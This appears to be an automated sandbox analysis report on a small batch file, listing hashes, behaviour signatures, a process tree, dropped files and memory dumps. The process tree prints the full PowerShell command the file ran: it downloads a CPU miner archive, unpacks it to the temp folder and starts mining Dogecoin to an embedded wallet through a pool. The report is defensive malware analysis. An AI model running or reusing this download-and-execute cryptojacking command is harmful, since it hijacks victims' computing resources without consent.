b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
148s
max time network
159s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
02/02/2024, 21:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	3036	powershell.exe
6	3036	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4344	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4344	cpuminer-sse2.exe
4344	cpuminer-sse2.exe
4344	cpuminer-sse2.exe
4344	cpuminer-sse2.exe
4344	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3036	powershell.exe
3036	powershell.exe
3036	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3036	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1568 wrote to memory of 3036	1568	cmd.exe	74
PID 1568 wrote to memory of 3036	1568	cmd.exe	74
PID 3036 wrote to memory of 4328	3036	powershell.exe	75
PID 3036 wrote to memory of 4328	3036	powershell.exe	75
PID 4328 wrote to memory of 4344	4328	cmd.exe	77
PID 4328 wrote to memory of 4344	4328	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4344

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yuseobab.wxa.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
955KB

MD5
7cdb2163bd3678761bb5bdb7231c2975

SHA1
2adde1f7e943bef5096d80d498c3c015fed3b89c

SHA256
8873664d21ef5f60bc9a15a1c9f03cf28e6947c79cdb3c6fb14fe6a3ff94f6e5

SHA512
c05ce76d3e4c3300692e4b8dd221b5f93c38e0f56873a3e83178fde644074fe5db06dc1fb89994295db7a4b6f21db15989ca01bb210fe83d7064cb1dd0fce505

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.0MB

MD5
f60e1666c5e18b6fdc00217caed7280f

SHA1
1218397027ded41b55052faedf6c89e8aa64c980

SHA256
b97a6a69cfb8ba1f8e490420447247885f041f6d3d2d0706b7fdf0645b8865c4

SHA512
b6a899e7ede9827bdfbc49d92bd225d9e87bd733fb3b207828856815b4b35f5e879518ccde1ea5b6e36caaa83b7fe93fb00ad42ed28d979995e2e21901981b79

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
813KB

MD5
d2e431d8b8fbfe51b25c4c0ff38198fa

SHA1
2200c89dd62a237aefcaa5a952e1f67d72a91705

SHA256
0a82e17f242192eb423092624014f865c898f99183f5a3d6193a5d5563087705

SHA512
35a91375e0246eba5996f9702936c1ce5ef61ed006e6157882bb52c33350cdf8f8218e94cc120efe7ee1b8bfe63cd45261d9885b0b10d56758596c524bddf640

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
994KB

MD5
c936a77951b7f02e39cb892e7a58f4bf

SHA1
beac529e792b673376fd7d82983e031c628e6982

SHA256
4515bf3dd7604cc15a54d3c0a1f12379c7b7efec915892387c72d2b442b29149

SHA512
d0665a6174f49bf5879b2f030c64b010836015578036f5cb79ac90f9e87770598bea75fcc860457b7ec5aae93c1659c48a31f22299dae9e3faaea6eae13edec7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
999KB

MD5
0d9a992a99a1b22f1634d4ab7e579dae

SHA1
7bfada1eb7c3656032fbe6816ea269e53f46f3b0

SHA256
2c6234e4e8bcb6d136ed977c37459f40b1343cd4df515b4f8f30a7d953ce77a6

SHA512
d2233cd647525614bf186342d7100ae0d06bd48120267ec361238a897bcdfd3b996d81d720190821ba1ff24e8b3e3a47b5a5bb04c12d2e42412605aa7962dda6

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
581KB

MD5
66d7a0e05e7b73a0f2e605b7168c40c2

SHA1
3ecf1a95a9152eb89d5b3698fd2bb131bd9316fd

SHA256
1ec7aa8afc80e75692ae4f740067ad9e849e47dbabea257cdbe4faae70b08609

SHA512
c674cf43b487224311c40929123e245b2efa518bb316e6aabf36a677a6407496f0ae5bc2c6db69150f89a8c9b177d9438d4ce8be4d0053ef50dccbc60c920c5a

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
881KB

MD5
1d174322d0e2c3dceac37c856b9ea948

SHA1
db169023cb74210a87763c1dca2170d0da6f2fee

SHA256
83a884bb8d5b16697c4a3ed9362b62c5f09168fa52e97a5d69612998f6be5a74

SHA512
3cd21e5e35f9ff9e322a11b6bcc929f121db412cc1c513dc47c8af426f9ae8fb3ef8aabd135242baa09f66cea13489df77c2fcbb4e6ef31d89af3b8bb2fc1e85

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
754KB

MD5
2c42e0b899ec21c14adc2fabd2f977f1

SHA1
0f719909d882276bfdca7bc65e576ff0ac27c167

SHA256
b7e6be0b861d576890d4d5c43745cfb98459b44c6ba9096976586940b5a2a982

SHA512
8cf7948996ba731ec8d851ac2c4fcd3bc21f8bf722e6d4a20b5e1af9addad4410253ca3b07398e3b1183c81096d9521045bcf566969fb24840950ac958aa12bb

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3036-31-0x00000179CE9E0000-0x00000179CE9F6000-memory.dmp

Filesize
88KB

Download
memory/3036-6-0x00007FFC06A90000-0x00007FFC0747C000-memory.dmp

Filesize
9.9MB

Download
memory/3036-36-0x00000179B6480000-0x00000179B6490000-memory.dmp

Filesize
64KB

Download
memory/3036-56-0x00000179CEA00000-0x00000179CEA12000-memory.dmp

Filesize
72KB

Download
memory/3036-69-0x00000179B63B0000-0x00000179B63BA000-memory.dmp

Filesize
40KB

Download
memory/3036-105-0x00000179B6480000-0x00000179B6490000-memory.dmp

Filesize
64KB

Download
memory/3036-114-0x00007FFC06A90000-0x00007FFC0747C000-memory.dmp

Filesize
9.9MB

Download
memory/3036-33-0x00000179CE8F0000-0x00000179CE9DD000-memory.dmp

Filesize
948KB

Download
memory/3036-4-0x00000179CE530000-0x00000179CE5C2000-memory.dmp

Filesize
584KB

Download
memory/3036-28-0x00000179B6480000-0x00000179B6490000-memory.dmp

Filesize
64KB

Download
memory/3036-13-0x00000179B6490000-0x00000179B6506000-memory.dmp

Filesize
472KB

Download
memory/3036-10-0x00000179CE7E0000-0x00000179CE8EE000-memory.dmp

Filesize
1.1MB

Download
memory/3036-9-0x00000179B63C0000-0x00000179B63E2000-memory.dmp

Filesize
136KB

Download
memory/3036-8-0x00000179B6480000-0x00000179B6490000-memory.dmp

Filesize
64KB

Download
memory/3036-7-0x00000179B6480000-0x00000179B6490000-memory.dmp

Filesize
64KB

Download
memory/3036-34-0x00007FFC06A90000-0x00007FFC0747C000-memory.dmp

Filesize
9.9MB

Download
memory/3036-5-0x00000179B6300000-0x00000179B6310000-memory.dmp

Filesize
64KB

Download
memory/4344-142-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-177-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-129-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4344-128-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4344-131-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/4344-132-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-157-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-127-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-130-0x0000000054910000-0x00000000549A8000-memory.dmp

Filesize
608KB

Download
memory/4344-162-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-167-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-172-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-147-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-182-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download